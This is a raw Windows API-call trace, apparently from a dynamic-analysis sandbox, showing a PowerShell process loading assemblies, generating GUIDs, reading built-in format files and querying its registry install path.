	[0540.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0540.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xac7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0540.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0xac7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0542.070] VirtualQuery (in: lpAddress=0xabe00, lpBuffer=0xaccc0, dwLength=0x30 | out: lpBuffer=0xaccc0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0542.071] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x86da0ccc, Data2=0xe20b, Data3=0x4a2e, Data4=([0]=0xb6, [1]=0x5b, [2]=0x61, [3]=0xc9, [4]=0x3e, [5]=0x1c, [6]=0x60, [7]=0x13))) returned 0x0
	[0542.072] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x2b0918c1, Data2=0xd04e, Data3=0x431f, Data4=([0]=0xaf, [1]=0x16, [2]=0x92, [3]=0x4a, [4]=0xc9, [5]=0x43, [6]=0xdc, [7]=0x43))) returned 0x0
	[0542.073] VirtualQuery (in: lpAddress=0xabfb0, lpBuffer=0xace70, dwLength=0x30 | out: lpBuffer=0xace70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0542.074] VirtualQuery (in: lpAddress=0xabfb0, lpBuffer=0xace70, dwLength=0x30 | out: lpBuffer=0xace70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0542.076] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x9951b41d, Data2=0xa55c, Data3=0x48e4, Data4=([0]=0x9f, [1]=0xc2, [2]=0x96, [3]=0x13, [4]=0x6d, [5]=0xf4, [6]=0x17, [7]=0x6))) returned 0x0
	[0542.079] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x30698344, Data2=0xf520, Data3=0x4876, Data4=([0]=0xaa, [1]=0xb8, [2]=0x67, [3]=0x6a, [4]=0xdd, [5]=0xb8, [6]=0xe1, [7]=0xe3))) returned 0x0
	[0542.079] VirtualQuery (in: lpAddress=0xac200, lpBuffer=0xad0c0, dwLength=0x30 | out: lpBuffer=0xad0c0*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0542.080] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xcc0af4e7, Data2=0xb493, Data3=0x45eb, Data4=([0]=0xbf, [1]=0x23, [2]=0xef, [3]=0x4, [4]=0x97, [5]=0xbe, [6]=0xde, [7]=0x2a))) returned 0x0
	[0542.910] VirtualQuery (in: lpAddress=0xac200, lpBuffer=0xad0c0, dwLength=0x30 | out: lpBuffer=0xad0c0*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0542.911] VirtualQuery (in: lpAddress=0xac020, lpBuffer=0xacee0, dwLength=0x30 | out: lpBuffer=0xacee0*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0542.912] VirtualQuery (in: lpAddress=0xab870, lpBuffer=0xac730, dwLength=0x30 | out: lpBuffer=0xac730*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0542.912] VirtualQuery (in: lpAddress=0xab870, lpBuffer=0xac730, dwLength=0x30 | out: lpBuffer=0xac730*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0542.913] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xfaefb116, Data2=0x156f, Data3=0x4249, Data4=([0]=0xb8, [1]=0xf5, [2]=0xbf, [3]=0x1f, [4]=0x55, [5]=0x68, [6]=0x6c, [7]=0xfc))) returned 0x0
	[0542.914] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xba72459f, Data2=0xedca, Data3=0x4266, Data4=([0]=0x96, [1]=0x41, [2]=0x68, [3]=0xe9, [4]=0x80, [5]=0xb3, [6]=0x2, [7]=0x65))) returned 0x0
	[0542.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0542.971] SetErrorMode (uMode=0x1) returned 0x1
	[0542.971] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0542.971] GetFileType (hFile=0x324) returned 0x1
	[0542.971] SetErrorMode (uMode=0x1) returned 0x1
	[0542.971] GetFileType (hFile=0x324) returned 0x1
	[0542.971] ReadFile (in: hFile=0x324, lpBuffer=0x2d5ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2d5ad70*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.383] ReadFile (in: hFile=0x324, lpBuffer=0x2d5ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2d5ad70*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.383] ReadFile (in: hFile=0x324, lpBuffer=0x2d5ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2d5ad70*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.383] ReadFile (in: hFile=0x324, lpBuffer=0x2d5ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2d5ad70*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.384] ReadFile (in: hFile=0x324, lpBuffer=0x2d5ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2d5ad70*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.384] ReadFile (in: hFile=0x324, lpBuffer=0x2d5ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2d5ad70*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.384] ReadFile (in: hFile=0x324, lpBuffer=0x2d5ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2d5ad70*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.384] ReadFile (in: hFile=0x324, lpBuffer=0x2d5ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2d5ad70*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.385] ReadFile (in: hFile=0x324, lpBuffer=0x2d5ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2d5ad70*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.386] ReadFile (in: hFile=0x324, lpBuffer=0x2d5ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2d5ad70*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.386] ReadFile (in: hFile=0x324, lpBuffer=0x2d5ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2d5ad70*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.386] ReadFile (in: hFile=0x324, lpBuffer=0x2d5ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2d5ad70*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.386] ReadFile (in: hFile=0x324, lpBuffer=0x2d5ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2d5ad70*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.386] ReadFile (in: hFile=0x324, lpBuffer=0x2d5ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2d5ad70*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.386] ReadFile (in: hFile=0x324, lpBuffer=0x2d5ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2d5ad70*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.387] ReadFile (in: hFile=0x324, lpBuffer=0x2d5ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2d5ad70*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.387] ReadFile (in: hFile=0x324, lpBuffer=0x2d5ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2d5ad70*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.387] ReadFile (in: hFile=0x324, lpBuffer=0x2d5ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2d5ad70*, lpNumberOfBytesRead=0xad2d8*=0xbce, lpOverlapped=0x0) returned 1
	[0543.387] ReadFile (in: hFile=0x324, lpBuffer=0x2d5a4a6, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2d5a4a6*, lpNumberOfBytesRead=0xad2d8*=0x0, lpOverlapped=0x0) returned 1
	[0543.387] ReadFile (in: hFile=0x324, lpBuffer=0x2d5ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2d5ad70*, lpNumberOfBytesRead=0xad2d8*=0x0, lpOverlapped=0x0) returned 1
	[0543.388] CloseHandle (hObject=0x324) returned 1
	[0543.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xad020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0543.388] SetErrorMode (uMode=0x1) returned 0x1
	[0543.388] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad280 | out: lpFileInformation=0xad280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0543.388] SetErrorMode (uMode=0x1) returned 0x1
	[0543.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0543.388] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad368 | out: phkResult=0xad368*=0x324) returned 0x0
	[0543.389] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad2ec, lpData=0x0, lpcbData=0xad2e8*=0x0 | out: lpType=0xad2ec*=0x1, lpData=0x0, lpcbData=0xad2e8*=0x56) returned 0x0
	[0543.389] CoTaskMemAlloc (cb=0x5a) returned 0x2560b0
	[0543.389] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad2bc, lpData=0x2560b0, lpcbData=0xad2b8*=0x56 | out: lpType=0xad2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xad2b8*=0x56) returned 0x0
	[0543.389] CoTaskMemFree (pv=0x2560b0) 
	[0543.389] RegCloseKey (hKey=0x324) returned 0x0
	[0543.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0543.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0543.390] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xf6e29757, Data2=0x17eb, Data3=0x4f40, Data4=([0]=0xa8, [1]=0xf2, [2]=0xd9, [3]=0x51, [4]=0x44, [5]=0x84, [6]=0xbf, [7]=0x66))) returned 0x0
	[0543.391] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x4602584e, Data2=0x8a4d, Data3=0x4f17, Data4=([0]=0x86, [1]=0x4b, [2]=0xc8, [3]=0x8f, [4]=0x3e, [5]=0x27, [6]=0x6, [7]=0x5a))) returned 0x0
	[0543.391] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xf7028556, Data2=0x7809, Data3=0x4fc9, Data4=([0]=0xa8, [1]=0xf0, [2]=0x2, [3]=0xa3, [4]=0x36, [5]=0x85, [6]=0x36, [7]=0xdf))) returned 0x0
	[0543.392] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xadae45e, Data2=0xd826, Data3=0x47b4, Data4=([0]=0x85, [1]=0x35, [2]=0xe8, [3]=0xeb, [4]=0x95, [5]=0x38, [6]=0xfb, [7]=0xce))) returned 0x0
	[0543.393] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xe675fd0, Data2=0x432d, Data3=0x4904, Data4=([0]=0x8e, [1]=0xe, [2]=0x9, [3]=0x6d, [4]=0x64, [5]=0x6c, [6]=0x54, [7]=0x64))) returned 0x0
	[0543.393] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x66a120ac, Data2=0x3c17, Data3=0x460b, Data4=([0]=0xb7, [1]=0xca, [2]=0x5e, [3]=0x55, [4]=0x59, [5]=0x3, [6]=0x93, [7]=0xfc))) returned 0x0
	[0543.393] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x80352019, Data2=0xf8d0, Data3=0x4ef7, Data4=([0]=0xbf, [1]=0xf8, [2]=0xb0, [3]=0x2f, [4]=0xdf, [5]=0x23, [6]=0xa6, [7]=0x3f))) returned 0x0
	[0543.393] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x3c11bab5, Data2=0xc10c, Data3=0x4e37, Data4=([0]=0xbd, [1]=0x52, [2]=0x9f, [3]=0x47, [4]=0x39, [5]=0x21, [6]=0xf0, [7]=0x32))) returned 0x0
	[0543.394] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xac918548, Data2=0x45c2, Data3=0x4825, Data4=([0]=0x99, [1]=0xa9, [2]=0x20, [3]=0xb0, [4]=0x1f, [5]=0xc3, [6]=0xd9, [7]=0xa3))) returned 0x0
	[0543.394] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xd10632fb, Data2=0xf158, Data3=0x4f66, Data4=([0]=0xa2, [1]=0xa7, [2]=0xe7, [3]=0xb, [4]=0x12, [5]=0xd4, [6]=0xb2, [7]=0x5d))) returned 0x0
	[0543.394] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xfe1e322c, Data2=0x2849, Data3=0x4137, Data4=([0]=0x8b, [1]=0x7, [2]=0x8c, [3]=0x2c, [4]=0x6b, [5]=0xdb, [6]=0xd3, [7]=0x88))) returned 0x0
	[0543.394] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xda9196d, Data2=0x1abd, Data3=0x4d16, Data4=([0]=0xb1, [1]=0x3c, [2]=0xc1, [3]=0xa7, [4]=0x77, [5]=0x4b, [6]=0x64, [7]=0x8d))) returned 0x0
	[0543.394] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x42f29c96, Data2=0xd735, Data3=0x41f8, Data4=([0]=0x83, [1]=0x1b, [2]=0x3a, [3]=0xcc, [4]=0xa4, [5]=0x29, [6]=0xc0, [7]=0xbf))) returned 0x0
	[0543.394] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x90bf7e1f, Data2=0xf159, Data3=0x4598, Data4=([0]=0xaa, [1]=0xf1, [2]=0xa5, [3]=0xd4, [4]=0xeb, [5]=0xe8, [6]=0x22, [7]=0xb7))) returned 0x0
	[0543.395] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xae58f0f7, Data2=0x5222, Data3=0x434f, Data4=([0]=0x93, [1]=0x94, [2]=0x99, [3]=0xcd, [4]=0x83, [5]=0xf0, [6]=0x26, [7]=0x51))) returned 0x0
	[0543.395] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x1376a242, Data2=0x9367, Data3=0x44b3, Data4=([0]=0x8c, [1]=0xfe, [2]=0xfa, [3]=0x33, [4]=0x38, [5]=0xae, [6]=0x8b, [7]=0x37))) returned 0x0
	[0543.395] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xd2c9eb7e, Data2=0xd1db, Data3=0x41f0, Data4=([0]=0x87, [1]=0x1d, [2]=0x49, [3]=0x12, [4]=0xc9, [5]=0xee, [6]=0x5, [7]=0x8d))) returned 0x0
	[0543.395] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xcb943f5d, Data2=0xf68f, Data3=0x49ca, Data4=([0]=0x83, [1]=0x1f, [2]=0x43, [3]=0xd9, [4]=0x19, [5]=0xe, [6]=0x4b, [7]=0xb4))) returned 0x0
	[0543.395] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xd284aedf, Data2=0x2576, Data3=0x41b4, Data4=([0]=0xbe, [1]=0xa8, [2]=0xb3, [3]=0x2e, [4]=0xf9, [5]=0x14, [6]=0xff, [7]=0x6))) returned 0x0
	[0543.395] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x5b9febe0, Data2=0x4a01, Data3=0x433a, Data4=([0]=0xbc, [1]=0xc1, [2]=0x81, [3]=0xdd, [4]=0x8c, [5]=0x9e, [6]=0xdb, [7]=0xe3))) returned 0x0
	[0543.396] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x9de9d6c5, Data2=0x73da, Data3=0x4da4, Data4=([0]=0xaa, [1]=0x72, [2]=0x7d, [3]=0x36, [4]=0x35, [5]=0x7e, [6]=0x6, [7]=0xa))) returned 0x0
	[0543.396] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x3910f719, Data2=0x8631, Data3=0x4d71, Data4=([0]=0x9b, [1]=0x63, [2]=0xd5, [3]=0x9, [4]=0x57, [5]=0xda, [6]=0x22, [7]=0x51))) returned 0x0
	[0543.396] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x2b9ebfe9, Data2=0x1413, Data3=0x4caf, Data4=([0]=0xa7, [1]=0xa5, [2]=0xc3, [3]=0xe5, [4]=0x50, [5]=0x78, [6]=0xed, [7]=0xa0))) returned 0x0
	[0543.396] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xf5f24147, Data2=0x7195, Data3=0x44a6, Data4=([0]=0x9f, [1]=0xc6, [2]=0x63, [3]=0xd2, [4]=0xce, [5]=0xd, [6]=0x44, [7]=0xb3))) returned 0x0
	[0543.396] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xc5ae05f1, Data2=0x5450, Data3=0x4730, Data4=([0]=0xb5, [1]=0x93, [2]=0xdc, [3]=0x52, [4]=0x63, [5]=0xa0, [6]=0x66, [7]=0x1a))) returned 0x0
	[0543.396] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x2cc58a3d, Data2=0x66d6, Data3=0x43f4, Data4=([0]=0x80, [1]=0x37, [2]=0xd8, [3]=0xd5, [4]=0x82, [5]=0x9f, [6]=0x2c, [7]=0xed))) returned 0x0
	[0543.396] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xd2f8a2cf, Data2=0x7a81, Data3=0x40ae, Data4=([0]=0xa3, [1]=0xe0, [2]=0x33, [3]=0xcd, [4]=0x13, [5]=0xba, [6]=0xfe, [7]=0x6a))) returned 0x0
	[0543.397] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x6072aba5, Data2=0x55c, Data3=0x4932, Data4=([0]=0x85, [1]=0x2f, [2]=0x2b, [3]=0x1a, [4]=0x36, [5]=0x33, [6]=0xe2, [7]=0x65))) returned 0x0
	[0543.397] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x1a48305b, Data2=0x62e0, Data3=0x4123, Data4=([0]=0x9e, [1]=0x22, [2]=0x8e, [3]=0x65, [4]=0x49, [5]=0xcc, [6]=0x93, [7]=0xcd))) returned 0x0
	[0543.397] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xeb64df27, Data2=0xcc23, Data3=0x4746, Data4=([0]=0x86, [1]=0x8, [2]=0x40, [3]=0xe0, [4]=0x71, [5]=0x90, [6]=0x76, [7]=0xce))) returned 0x0
	[0543.397] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x4b4bb737, Data2=0x8df1, Data3=0x46e9, Data4=([0]=0x83, [1]=0x25, [2]=0xc8, [3]=0x14, [4]=0x4e, [5]=0x94, [6]=0x1e, [7]=0xfd))) returned 0x0
	[0543.397] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x8a824ce0, Data2=0xc52d, Data3=0x48c0, Data4=([0]=0xbc, [1]=0xfd, [2]=0x5a, [3]=0x93, [4]=0x2, [5]=0xee, [6]=0xdd, [7]=0x70))) returned 0x0
	[0543.397] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xb22cb83d, Data2=0x5eec, Data3=0x4d0e, Data4=([0]=0xb2, [1]=0x4c, [2]=0xd7, [3]=0xe0, [4]=0x7e, [5]=0x7a, [6]=0x96, [7]=0x87))) returned 0x0
	[0543.397] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x47f11a39, Data2=0x5ea, Data3=0x4e44, Data4=([0]=0x9b, [1]=0x51, [2]=0x2, [3]=0x1b, [4]=0x4d, [5]=0xb8, [6]=0xf5, [7]=0xb8))) returned 0x0
	[0543.397] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x7a57b25c, Data2=0x4be9, Data3=0x45d4, Data4=([0]=0x82, [1]=0x9b, [2]=0xf2, [3]=0x24, [4]=0x68, [5]=0x76, [6]=0x97, [7]=0xa))) returned 0x0
	[0543.398] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x1357bee4, Data2=0xd3b1, Data3=0x48d0, Data4=([0]=0xb5, [1]=0xe1, [2]=0x4f, [3]=0x8a, [4]=0x62, [5]=0xb1, [6]=0xa1, [7]=0xda))) returned 0x0
	[0543.398] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x3bc0d89f, Data2=0x82c1, Data3=0x48f3, Data4=([0]=0x98, [1]=0x50, [2]=0x64, [3]=0x0, [4]=0xf9, [5]=0x4, [6]=0x36, [7]=0x75))) returned 0x0
	[0543.398] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0543.399] GetFileType (hFile=0x324) returned 0x1
	[0543.399] SetErrorMode (uMode=0x1) returned 0x1
	[0543.399] GetFileType (hFile=0x324) returned 0x1
	[0543.399] ReadFile (in: hFile=0x324, lpBuffer=0x2e6b358, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b358*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.399] ReadFile (in: hFile=0x324, lpBuffer=0x2e6b358, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b358*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.399] ReadFile (in: hFile=0x324, lpBuffer=0x2e6b358, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b358*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.399] ReadFile (in: hFile=0x324, lpBuffer=0x2e6b358, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b358*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
